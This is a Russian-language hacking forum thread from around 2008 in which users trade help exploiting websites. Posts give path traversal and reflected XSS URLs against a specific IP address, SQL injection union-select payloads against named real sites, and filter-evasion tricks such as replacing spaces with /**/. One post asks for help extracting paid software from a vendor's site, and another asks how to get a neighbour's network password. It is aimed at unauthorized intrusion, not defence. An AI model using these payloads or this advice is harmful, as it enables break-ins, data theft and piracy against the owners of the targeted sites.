Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    diehard, хэши - это хорошо =) Там, кстати, можно и без пароля зайти))
    ЗЫ. Алгоритм хэширования - MySQL4 aka OLD_PASSWORD в пятом мускуле
     
  2. Gema

    Gema Member

    Joined:
    18 Sep 2008
    Messages:
    0
    Likes Received:
    16
    Reputations:
    0

    Можно делать листинг путем команд в переменной

    пример http://212.32.214.246:8080/for_ssr/CodyServlet?jsp=/../
     
    3 people like this.
  3. Gema

    Gema Member

    Joined:
    18 Sep 2008
    Messages:
    0
    Likes Received:
    16
    Reputations:
    0
    в принципе да.

    держи еще xss пассив =)

    http://212.32.214.246:8080/for_ssr/CodyServlet?jsp=/Service_Online.jsp&Type=%3Cscript%3Ealert(%22111%22)%3C/script%3E
     
  4. IND1G0

    IND1G0 New Member

    Joined:
    21 Sep 2008
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    http://сайт/id=0+union+select+1/*

    Выводит

    (страница 0 union select 1/* из 1)
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 16

    Такая ошибка выходит постоянно, перебрал до http://сайт/id=0+union+select+1,...,35/*
    Как можно заюзать эту ошибку?
     
    #3324 IND1G0, 25 Sep 2008
    Last edited: 25 Sep 2008
  5. cash$$$

    cash$$$ Banned

    Joined:
    6 Jan 2008
    Messages:
    385
    Likes Received:
    246
    Reputations:
    10
    А почему у тебя id=0?? попробуй -1 или 99999.
     
  6. IND1G0

    IND1G0 New Member

    Joined:
    21 Sep 2008
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    если даже так разницы нет)

    А да и еще на сайте есть XSS
    http://сайт/id=[XSS]/*
     
    #3326 IND1G0, 25 Sep 2008
    Last edited: 25 Sep 2008
  7. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Ссылку хоть дай
     
  8. cash$$$

    cash$$$ Banned

    Joined:
    6 Jan 2008
    Messages:
    385
    Likes Received:
    246
    Reputations:
    10
    А оставить ковычку пробывал?
     
  9. IND1G0

    IND1G0 New Member

    Joined:
    21 Sep 2008
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    Да уже все перепробовал...
    Мне интересно почему висит вот эта ошибка постоянно независимо от того что вбивать в http://сайт/id=/*
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 16
     
  10. MirA

    MirA Member

    Joined:
    24 Jul 2008
    Messages:
    25
    Likes Received:
    16
    Reputations:
    0
    Попробуй использовать такой комент "--" вместо "/*"
     
  11. IND1G0

    IND1G0 New Member

    Joined:
    21 Sep 2008
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    тоже уже пробовал
     
  12. none222

    none222 Guest

    Reputations:
    0
    а ещё вот такой +--+

    и проверь на раскрытые скобки в запросе. Попробуй проанализировать, что там фильтруется
     
  13. DJ ][akep

    DJ ][akep Member

    Joined:
    27 Jan 2008
    Messages:
    93
    Likes Received:
    20
    Reputations:
    1
    Помогите SQL-inj
    Вот кол-во столбцов вроде подобрал
    PHP:
    http://moy-gorod.com.ua/cat.phtml?curcat=-999'+order+by+21/*
    но так нехочет:
    PHP:
    http://moy-gorod.com.ua/cat.phtml?curcat=-999'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
     
  14. SIdoy

    SIdoy Member

    Joined:
    19 Sep 2007
    Messages:
    12
    Likes Received:
    6
    Reputations:
    0

    Попробуй вместо пробелов /**/

    id=0/**/union/**/select/**/1/*
     
  15. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    у меня была такая же трабла с запросом. Когда подставляешь ` (обратную кавычку) то результат меняется...
     
  16. luz3r

    luz3r Banned

    Joined:
    23 Feb 2008
    Messages:
    119
    Likes Received:
    250
    Reputations:
    -11
    Без разницы какую кавычку ставить ... Важно изменить так чтобы страница имела отрицательное значение.
     
  17. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    Скорее всего одна переменная идёт в два разных запроса с разной структурой, т.е. разное количество столбцов

    Бред. Значение из переменной подставляется в limit, а т.к. в лимит нельзя вставлять выражения, то ты в пролёте.

    Надо чтобы значение не существовало
     
    _________________________
    #3337 +toxa+, 25 Sep 2008
    Last edited: 25 Sep 2008
  18. luz3r

    luz3r Banned

    Joined:
    23 Feb 2008
    Messages:
    119
    Likes Received:
    250
    Reputations:
    -11
    я ето имел в виду.
     
  19. Gema

    Gema Member

    Joined:
    18 Sep 2008
    Messages:
    0
    Likes Received:
    16
    Reputations:
    0
    помогите заюзать http://ktools.net/news_detail.php?nid=' нужно вытащить двиги которые продаются
     
  20. 777DEMYAN777

    777DEMYAN777 Elder - Старейшина

    Joined:
    31 May 2008
    Messages:
    48
    Likes Received:
    12
    Reputations:
    0
    Как узнать пасс на инет у соседа? у нас с ним сетка!!!
     
Thread Status:
Not open for further replies.